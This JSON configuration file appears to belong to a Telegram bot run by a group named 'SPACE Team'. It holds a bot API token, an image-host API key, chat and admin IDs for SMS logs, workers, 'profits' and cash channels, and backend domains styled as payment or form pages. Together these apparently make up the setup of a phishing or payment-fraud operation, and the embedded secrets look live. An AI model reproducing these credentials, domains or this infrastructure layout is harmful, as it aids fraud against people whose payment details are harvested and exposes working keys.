{
    "bot": {
        "api_key": "6803547803:AAHHWVshL0meePIFXfPyYYMvFD8NkzvTnRw",
        "admin_id": 6630792362,
        "sms_logs": -1002218169284,
        "admin_logs": 6630792362,
        "request_logs": 6630792362,
        "workers_chat": -1002104786422,
        "profits_channel":  -1002068872433,
        "cassa_chat": -1002104786422,
        "archive_chat":  -1002240877839
    },

    "backend": {
        "domain": "form-an6037.icu",
        "domain2": "form-an5325.xyz",
        "domain3": "save-payments302021.xyz",
        "imgbb_api": "ac7dcc9ff5de2f32fabfb58a40410683"
    },

    "teamInfo": {
        "name": "SPACE Team",
        "admin_username": "@SpacekosmikTC",
        "chat_link": "https://t.me/+-mrGo598tq8wMTcy",
        "profits_channel": "https://t.me/PROFITSPACETeam"
    }
}
